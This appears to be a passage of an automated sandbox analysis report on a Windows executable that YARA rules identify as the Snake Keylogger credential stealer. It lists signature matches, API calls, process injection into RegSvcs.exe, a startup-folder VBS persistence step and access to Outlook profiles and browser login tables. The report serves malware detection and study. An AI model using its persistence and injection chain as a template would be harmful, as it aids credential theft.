                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01893E097_2_01893E09
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: String function: 002D0AE3 appears 70 times
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: String function: 002D8900 appears 42 times
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: String function: 002B7DE1 appears 35 times
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: String function: 00027DE1 appears 35 times
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: String function: 00040AE3 appears 70 times
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: String function: 00048900 appears 42 times
                Source: 6BRa130JDj.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000003.00000002.4526688861.0000000000423000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: Process Memory Space: ectosphere.exe PID: 2848, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 2804, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: ectosphere.exe PID: 2920, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/6@3/3
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0031A06A GetLastError,FormatMessageW,0_2_0031A06A
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_003081CB AdjustTokenPrivileges,CloseHandle,0_2_003081CB
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_003087E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_003087E1
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000781CB AdjustTokenPrivileges,CloseHandle,2_2_000781CB
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000787E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_000787E1
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0031B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0031B333
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0032EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0032EE0D
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_003283BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_003283BB
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002B4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_002B4E89
                Source: C:\Users\user\Desktop\6BRa130JDj.exeFile created: C:\Users\user\AppData\Local\AlleneJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                Source: C:\Users\user\Desktop\6BRa130JDj.exeFile created: C:\Users\user\AppData\Local\Temp\aut235A.tmpJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs"
                Source: 6BRa130JDj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002F18000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000035A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 6BRa130JDj.exeReversingLabs: Detection: 75%
                Source: C:\Users\user\Desktop\6BRa130JDj.exeFile read: C:\Users\user\Desktop\6BRa130JDj.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\6BRa130JDj.exe "C:\Users\user\Desktop\6BRa130JDj.exe"
                Source: C:\Users\user\Desktop\6BRa130JDj.exeProcess created: C:\Users\user\AppData\Local\Allene\ectosphere.exe "C:\Users\user\Desktop\6BRa130JDj.exe"
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\6BRa130JDj.exe"
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Allene\ectosphere.exe "C:\Users\user\AppData\Local\Allene\ectosphere.exe"
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Allene\ectosphere.exe"
                Source: C:\Users\user\Desktop\6BRa130JDj.exeProcess created: C:\Users\user\AppData\Local\Allene\ectosphere.exe "C:\Users\user\Desktop\6BRa130JDj.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\6BRa130JDj.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Allene\ectosphere.exe "C:\Users\user\AppData\Local\Allene\ectosphere.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Allene\ectosphere.exe" Jump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: 6BRa130JDj.exeStatic file information: File size 1055744 > 1048576
                Source: 6BRa130JDj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 6BRa130JDj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 6BRa130JDj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 6BRa130JDj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 6BRa130JDj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 6BRa130JDj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 6BRa130JDj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP source: ectosphere.exe, 00000002.00000003.2129514544.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000002.00000003.2129732590.0000000003880000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000003.2283695508.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000003.2285547313.00000000043C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ectosphere.exe, 00000002.00000003.2129514544.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000002.00000003.2129732590.0000000003880000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000003.2283695508.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000003.2285547313.00000000043C0000.00000004.00001000.00020000.00000000.sdmp
                Source: 6BRa130JDj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 6BRa130JDj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 6BRa130JDj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 6BRa130JDj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 6BRa130JDj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002B4B37 LoadLibraryA,GetProcAddress,0_2_002B4B37
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002D8945 push ecx; ret 0_2_002D8958
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_00048945 push ecx; ret 2_2_00048958
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01899C30 push esp; retf 018Bh7_2_01899D55
                Source: C:\Users\user\Desktop\6BRa130JDj.exeFile created: C:\Users\user\AppData\Local\Allene\ectosphere.exeJump to dropped file

                Boot Survival

                barindex
                Drops VBS files to the startup folder
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbsJump to dropped file
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbsJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbsJump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002B48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_002B48D7
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_00335376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00335376
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_000248D7
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000A5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_000A5376
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002D3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_002D3187
                Source: C:\Users\user\Desktop\6BRa130JDj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
